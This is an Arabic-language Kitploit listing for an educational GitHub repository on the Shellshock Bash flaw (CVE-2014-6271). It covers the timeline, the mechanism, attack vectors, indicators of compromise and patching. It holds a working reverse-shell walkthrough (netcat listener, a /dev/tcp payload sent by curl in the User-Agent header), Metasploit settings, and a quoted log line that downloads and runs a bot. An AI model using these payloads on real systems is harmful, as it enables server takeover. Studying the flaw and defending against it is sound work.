Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
-CVE-2014-6271 — مستودع تعليمي يوضح بالتفصيل ثغرة Shellshock (CVE-2014-6271)، ويشمل تحليلاً تقنياً، ونواقل الهجوم، وإثبات المفهوم للاستغلال، وخطوات التخفيف لحقن متغيرات البيئة في Bash. | Kitploit
أدوات/GitHubGitHub/kaleth4/-cve-2014-6271
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubkaleth4/-cve-2014-6271

-CVE-2014-6271

مستودع تعليمي يوضح بالتفصيل ثغرة Shellshock (CVE-2014-6271)، ويشمل تحليلاً تقنياً، ونواقل الهجوم، وإثبات المفهوم للاستغلال، وخطوات التخفيف لحقن متغيرات البيئة في Bash.

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
root@kitploit:~
 ____  _   _ _____ _     _     ____  _   _  ___   ____ _  __
/ ___|| | | | ____| |   | |   / ___|| | | |/ _ \ / ___| |/ /
\___ \| |_| |  _| | |   | |   \___ \| |_| | | | | |   | ' / 
 ___) |  _  | |___| |___| |___ ___) |  _  | |_| | |___| . \ 
|____/|_| |_|_____|_____|_____|____/|_| |_|\___/ \____|_|\_\

CVE-2014-6271 — شيلشوك

تنفيذ الأوامر عن بُعد عبر حقن متغيرات بيئة باش

CVE CVSS Type Bash Status

"ثغرة ظلت مخفية في باش لعقود وهزت أسس الإنترنت في أقل من 24 ساعة."


الفهرس

  • ما هو شيلشوك؟
  • الجدول الزمني
  • الأنظمة المتأثرة
  • الوصف التقني
  • إثبات المفهوم — PoC
  • نواقل الهجوم
  • الاستغلال الكامل
  • مؤشرات الاختراق
  • التخفيف
  • إخلاء مسؤولية

❓ ما هو شيلشوك؟

شيلشوك (المعروف أيضًا باسم باشدور) هو عائلة من الثغرات الحرجة في مترجم الأوامر GNU Bash تسمح للمهاجم عن بُعد بتنفيذ أوامر اعتباطية على النظام المستهدف.

الخطأ الأساسي: لم يكن باش يتوقف عن تحليل متغير البيئة عند انتهاء تعريف الدالة. أي كود مُلحق بعد () { :; }; كان يُنفَّذ تلقائيًا.

root@kitploit:~
متغير بيئة → تعريف دالة → [هنا يُنفَّذ كود إضافي] ← خطأ

ونظرًا لأن خوادم الويب (CGI/Apache)، وخدمات SSH، وعملاء DHCP يُحوِّلون الرؤوس أو المعلمات إلى متغيرات بيئة باش، كانت مساحة الهجوم هائلة.


📅 الجدول الزمني

root@kitploit:~
12 سبتمبر 2014 ──── يكتشف ستيفان شازلاس الخلل ويبلغ به شيت رامي (مُطوِّر باش)
                   الخلل موجود في باش منذ أكثر من 20 عامًا.

24 سبتمبر 2014 ──── الكشف العلني + نشر التصحيح (CVE-2014-6271)
                   بعد ساعات: شبكات بوت نشطة تمسح الإنترنت بشكل هائل.

25-30 سبتمبر 2014 ── اكتشاف ثغرات ذات صلة:
                   CVE-2014-6277, CVE-2014-6278, CVE-2014-7169,
                   CVE-2014-7186, CVE-2014-7187

أكتوبر 2014 ──────── تسجيل ملايين الهجمات. مُقارَنة من حيث الشدة مع هارت بليد.

💻 الأنظمة المتأثرة


🔬 الوصف التقني

آلية الخلل

عندما يستورد باش دالة من متغير بيئة، يقرأ حتى إغلاق } الخاص بالدالة. في الإصدارات المعرضة، كان يستمر في معالجة الكود التالي بدلاً من التوقف.

root@kitploit:~
# متغير بيئة خبيث:
SHELLSHOCK='() { :; }; /bin/cat /etc/passwd'

# باش معرض عند التشغيل:
# 1. يقرأ تعريف الدالة → حسنًا
# 2. يجد }; → يجب أن يتوقف
# 3. يَستمر → ينفذ /bin/cat /etc/passwd ← خطأ

تدفق الهجوم عبر CGI

root@kitploit:~
المهاجم                    خادم Apache (CGI)              باش (معرض)
   │                               │                                │
   │  طلب HTTP                     │                                │
   │  User-Agent: () { :;}; cmd    │                                │
   │──────────────────────────────▶│                                │
   │                               │  يُحوِّل الرؤوس إلى متغيرات بيئة │
   │                               │  HTTP_USER_AGENT=() { :;}; cmd │
   │                               │───────────────────────────────▶│
   │                               │                                │ ينفذ الأمر
   │                               │                                │ كمستخدم www-data
   │◀──────────────────────────────│◀───────────────────────────────│
   │  استجابة + مخرجات الأمر      │                                │

🧪 إثبات المفهوم — PoC

التحقق الأساسي من الثغرة

root@kitploit:~
env x='() { :;}; echo VULNERABLE' bash -c "echo this is a test"

النتيجة في نظام معرض:

root@kitploit:~
VULNERABLE
this is a test

النتيجة في نظام مصحَّح:

root@kitploit:~
this is a test

(أو خطأ نحوي — لا يطبع أبدًا "VULNERABLE")


⚔️ نواقل الهجوم

1. CGI-BIN (الأكثر شيوعًا)

خوادم الويب التي تستخدم نصوص .cgi تُحوِّل رؤوس HTTP إلى متغيرات بيئة باش.

root@kitploit:~
الرؤوس المتأثرة: User-Agent, Referer, Cookie, X-Forwarded-For, وأي رأس مخصص

2. SSH مع ForceCommand

root@kitploit:~
# إذا كان الخادم يحتوي على ForceCommand، يمكن للمهاجم بمفتاح صالح تجاوزه
ssh user@target '() { :;}; /bin/bash'

3. عميل DHCP

خوادم DHCP خبيثة يمكنها حقن متغيرات بيئة في العملاء الذين يستخدمون باش لمعالجة استجابة DHCP.

4. متغيرات البيئة المباشرة

root@kitploit:~
# أي عملية ترث متغيرات بيئة وتنفذ باش
env VAR='() { :;}; comando_malicioso' bash -c "script_legítimo"

💀 الاستغلال الكامل: شيل عكسي

الخطوة 1: مستمع على آلة المهاجم

root@kitploit:~
nc -lvnp 4444

الخطوة 2: الحمولة للشيل العكسي

root@kitploit:~
# الحمولة التي تُحقَن في User-Agent
() { :;}; /bin/bash -i >& /dev/tcp/IP_ATACANTE/4444 0>&1

الخطوة 3: إرسال الطلب الخبيث

root@kitploit:~
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.10/4444 0>&1" \
     http://sitio-vulnerable.com/cgi-bin/test.cgi

الخطوة 4: الحصول على الشيل

root@kitploit:~
Connection received from 10.10.10.50
bash: no job control in this shell
sh-4.1$ id
uid=48(apache) gid=48(apache) groups=48(apache)

وحدة Metasploit

root@kitploit:~
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <target>
set TARGETURI /cgi-bin/test.cgi
set LHOST <your_ip>
run

🔍 مؤشرات الاختراق (IOC)

في سجلات Apache/Nginx

root@kitploit:~
# ابحث عن النمط المميز في access.log
grep -E "\(\)\s*\{" /var/log/apache2/access.log

# مثال على سجل خبيث:
# "() { :;}; wget http://malware.com/bot -O /tmp/x && chmod +x /tmp/x && /tmp/x"

العمليات المشبوهة

root@kitploit:~
# عمليات فرعية لـ www-data/apache لا ينبغي أن تكون موجودة
ps aux | grep www-data | grep -v grep
netstat -antup | grep ESTABLISHED

مؤشرات في النظام

root@kitploit:~
- ملفات تنفيذية جديدة في /tmp, /var/tmp, /dev/shm
- اتصالات صادرة من خادم الويب إلى عناوين IP غير معروفة
- تعديل /etc/crontab أو /etc/passwd
- عمليات باش قيد التشغيل كمستخدم www-data بدون طرفية

🛡️ التخفيف

التصحيح الفوري (أولوية حرجة)

root@kitploit:~
# دبيان / أوبونتو
sudo apt-get update && sudo apt-get install --only-upgrade bash

# RHEL / CentOS / فيدورا
sudo yum update bash

# التحقق من الإصدار المصحَّح (يجب أن يظهر "patches")
bash --version
# GNU bash, version 4.3.30(1)-release → معرض
# GNU bash, version 4.3.33(1)-release → مصحَّح (يختلف حسب التوزيعة)

التحقق بعد التصحيح

root@kitploit:~
# يجب أن يعيد فقط "this is a test" — أبدًا "VULNERABLE"
env x='() { :;}; echo VULNERABLE' bash -c "echo this is a test"

إجراءات إضافية

root@kitploit:~
# 1. تعطيل CGI إذا لم يكن ضروريًا
a2dismod cgi

# 2. قاعدة WAF لحظر النمط
# في ModSecurity:
SecRule REQUEST_HEADERS "@rx \(\)\s*\{" "id:1001,phase:1,deny,msg:'Shellshock Attempt'"

# 3. مراقبة مستمرة للسجلات
tail -f /var/log/apache2/access.log | grep -E "\(\)\s*\{"

⚠️ إخلاء مسؤولية

هذا المستودع مخصص حصريًا للأغراض التعليمية، وبحوث الأمن السيبراني، وعمليات التدقيق الأمني المصرح بها. جميع المعلومات المقدمة هنا هي في المجال العام. إجراء اختبارات ضد أنظمة دون إذن صريح غير قانوني بموجب قوانين معظم الولايات القضائية. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذه المعلومات.


اكتشفه ستيفان شازلاس · نُشر في 24 سبتمبر 2014

CVSS Score: 10.0 (Critical) → عُدِّل لاحقًا إلى 9.8 في CVSSv3

تنزيل الأداة
المنتجالإصدارات المعرضة للخطرالحالة
GNU Bash1.0.3 – 4.3تم التصحيح
لينكس (Debian/Ubuntu/CentOS/RHEL)الإصدارات قبل سبتمبر 2014تم التصحيح
Apple macOS / OS X10.10 وما قبلهتم التصحيح (التحديث الأمني 2014-005)
أجهزة إنترنت الأشياء المضمنة مع باشمتعددةيختلف حسب المُصنِّع
خوادم ويب تستخدم CGI فوق Apacheأي إصدار به باش معرضتم التصحيح